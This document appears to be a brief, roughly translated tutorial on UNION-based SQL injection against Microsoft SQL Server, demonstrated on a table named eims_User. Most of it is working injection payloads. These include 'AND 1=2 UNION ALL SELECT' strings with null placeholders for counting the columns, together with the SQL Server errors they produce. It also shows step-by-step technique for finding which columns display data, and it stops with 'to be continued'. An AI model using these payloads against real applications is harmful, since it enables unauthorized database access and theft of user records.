SQL SERVER injection Principle Demonstration

SQL SERVER injection Principle Demonstration

The operation of the injection scenario in the database is reproduced.
Injection
'Message 206, level 16, status 2, 9th rows
Operand type conflict: ntext is incompatible with int
SELECT * FROM eims_User WHERE UserID = '4' AND 1 = 2

Union all select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19
Message 206, level 16, status 2, 9th rows
Operand type conflict: ntext is incompatible with int

The solution is to use union all to replace union, and use null to replace the number of number segments. When the number is reached, replace null with a number.

20 null errors,
 

SELECT * FROM eims_User WHERE UserID='4' AND 1=1UNION ALL  SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null SELECT * FROM eims_User WHERE UserID='4' AND 1=1UNION ALL  SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null 

(But at this time and 1 = 1, two rows are returned)
If 19 are null, all returns are normal. Therefore, it can be determined that the table has 19 fields.

At this time, replace AND 1 = 1 with AND 1 = 2, AND replace null with int-type values, one by one. When an error is reported, replace the error bit with the original null, others remain unchanged.
In this way, the display bit can be obtained.

SELECT * FROM eims_User WHERE UserID = '4' AND 1 = 2
Union all select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, null, 17, 18, 19

Other operations, To be continued...